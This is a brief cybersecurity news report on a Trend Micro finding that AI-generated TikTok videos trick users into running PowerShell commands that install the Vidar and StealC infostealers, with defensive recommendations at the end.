193/68 Wednesday, May 28, 2025
Cybersecurity experts at Trend Micro have uncovered a malicious campaign where cybercriminals are leveraging AI-generated TikTok videos to trick users into executing PowerShell commands that install dangerous malware such as Vidar and StealC. The videos claim to show users how to activate popular software like Windows, Microsoft Office, CapCut, or Spotify. Some of these deceptive clips have reached up to 500,000 views, highlighting how TikTok’s algorithm can dramatically accelerate the spread of such threats.
Trend Micro reports that these videos share highly similar visual and audio patterns, strongly suggesting they were generated automatically using AI tools. The campaign underscores how threat actors are effectively exploiting major social media platforms to distribute malware. One of the most viral videos received nearly half a million views, over 20,000 likes, and hundreds of comments—demonstrating a high level of user trust and the potentially widespread impact of such attacks.
Once installed via PowerShell commands, Vidar and StealC connect to Command-and-Control (C&C) servers to carry out further malicious activities. Vidar disguises the details of its C&C infrastructure by embedding them within legitimate-looking services like Steam and Telegram, hiding the server data in public user profiles to evade detection. StealC, in contrast, connects directly via raw IP addresses. These stealth techniques help attackers maintain control while avoiding detection by traditional security solutions. Experts warn that this trend requires a shift in defensive strategy—emphasizing behavioral analysis, social media monitoring, and user education, rather than relying solely on signature-based detection of code or domains.
